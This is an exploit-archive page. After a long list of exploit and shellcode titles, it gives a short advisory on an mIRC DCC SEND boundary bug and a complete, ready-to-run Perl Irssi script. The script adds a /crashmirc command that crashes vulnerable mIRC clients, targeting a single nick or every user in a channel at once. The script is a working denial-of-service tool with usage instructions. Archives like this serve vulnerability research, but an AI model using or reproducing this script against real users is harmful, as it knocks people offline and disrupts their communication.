
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
105 lines
No EOL
3.7 KiB
Perl
Executable file
105 lines
No EOL
3.7 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/8818/info
|
|
|
|
A vulnerability has been reported to exist in the mIRC client that may allow a remote attacker to crash a vulnerable mIRC client. The condition is most likely present due to insufficient boundary checking performed on 'DCC SEND' requests.
|
|
|
|
It has been reported that when received, a malicious 'DDC SEND' request can trigger a fatal error and cause an affected mIRC client to crash.
|
|
|
|
#!/usr/bin/perl
|
|
|
|
# mIRC v.6.01-6.11 DCC bug crash script
|
|
# usage:
|
|
# /crashmirc <#chan> crashes every user with vulnerable mIRC client on <#chan>
|
|
# /crashmirc <nick> crashes <nick> with vulnerable mIRC client
|
|
#
|
|
# v0.4: fixed bug with dcc send command, thx to DarkAngel
|
|
|
|
use Irssi;
|
|
use strict;
|
|
|
|
use vars qw($VERSION %IRSSI);
|
|
|
|
$VERSION = "0.4";
|
|
%IRSSI = (
|
|
authors => 'Philipp Sieweck, DarkAngel',
|
|
description => 'Crashs another mIRC client using the ' .
|
|
'dcc-filename-too-long bug',
|
|
license => 'GPL',
|
|
contact => 'psieweck@freenet.de (PGP UserID: 4496DDC2), ' .
|
|
'darkangel(at)hysteria(dot)sk',
|
|
version => $VERSION
|
|
);
|
|
|
|
#sub generate_random_string($)
|
|
#{
|
|
# my $string_length = shift;
|
|
# my $str = '';
|
|
# my $strchr = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOQRSTUVWXYZ';
|
|
#
|
|
# for (my $i = 0; $i < $string_length; $i++) {
|
|
# my $ri = int(rand(length($strchr)));
|
|
# $str .= substr($strchr, $ri, 1);
|
|
# }
|
|
#
|
|
# return $str;
|
|
#}
|
|
|
|
sub generate_crash_string($)
|
|
{
|
|
my $string_length = shift;
|
|
my $str;
|
|
|
|
for (my $i = 0; $i < $string_length/2; $i++) {
|
|
$str .= 'a ';
|
|
}
|
|
$str .= 'a';
|
|
return $str;
|
|
}
|
|
sub create_dcc_send_message($$$$$)
|
|
{
|
|
my ($nick, $ip, $filename, $filesize, $port) = @_;
|
|
my @ip_chunks = $ip =~ /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;
|
|
my $cip = $ip_chunks[0]*256*256*256
|
|
+ $ip_chunks[1]*256*256
|
|
+ $ip_chunks[2]*256
|
|
+ $ip_chunks[3];
|
|
|
|
return "PRIVMSG $nick :\x01DCC SEND $filename $cip $port $filesize\x01";
|
|
}
|
|
|
|
sub crash_mirc($$$)
|
|
{
|
|
my ($data, $server, $witem) = @_;
|
|
|
|
unless ($server) {
|
|
print CLIENTCRAP '%W[%R!%W]%n Not connected to Server!';
|
|
return;
|
|
}
|
|
|
|
$data =~ /^(\S+)/;
|
|
my $nick = $1;
|
|
unless ($nick) {
|
|
print CLIENTCRAP '%W[%R!%W]%n Syntax: /crashmirc <#chan>|<nick>';
|
|
return;
|
|
}
|
|
|
|
my $port = Irssi::settings_get_int('mirc_dcc_crash_dccport');
|
|
my $filesize = Irssi::settings_get_int('mirc_dcc_crash_filesize');
|
|
my $sender_ip = Irssi::settings_get_str('mirc_dcc_crash_sender_ip');
|
|
my $filename_length = Irssi::settings_get_int('mirc_dcc_crash_filename_length');
|
|
my $filename_suffix = Irssi::settings_get_str('mirc_dcc_crash_filename_suffix');
|
|
|
|
print CLIENTCRAP '%W[%B-%W]%n Sending DCC CrashMsg to %W' . $nick . '%n';
|
|
my $raw_str = &create_dcc_send_message($nick, $sender_ip,
|
|
# &generate_random_string($filename_length).$filename_suffix,
|
|
'"'.&generate_crash_string($filename_length).$filename_suffix.'"',
|
|
$filesize, $port);
|
|
$server->send_raw($raw_str);
|
|
}
|
|
|
|
Irssi::settings_add_int('mirc_dcc_crash', 'mirc_dcc_crash_dccport', 34234);
|
|
Irssi::settings_add_int('mirc_dcc_crash', 'mirc_dcc_crash_filesize', 32234234);
|
|
Irssi::settings_add_str('mirc_dcc_crash', 'mirc_dcc_crash_sender_ip', '80.34.2.234');
|
|
Irssi::settings_add_str('mirc_dcc_crash', 'mirc_dcc_crash_filename_suffix', '');
|
|
Irssi::settings_add_int('mirc_dcc_crash', 'mirc_dcc_crash_filename_length', 400);
|
|
|
|
Irssi::command_bind('crashmirc', 'crash_mirc'); |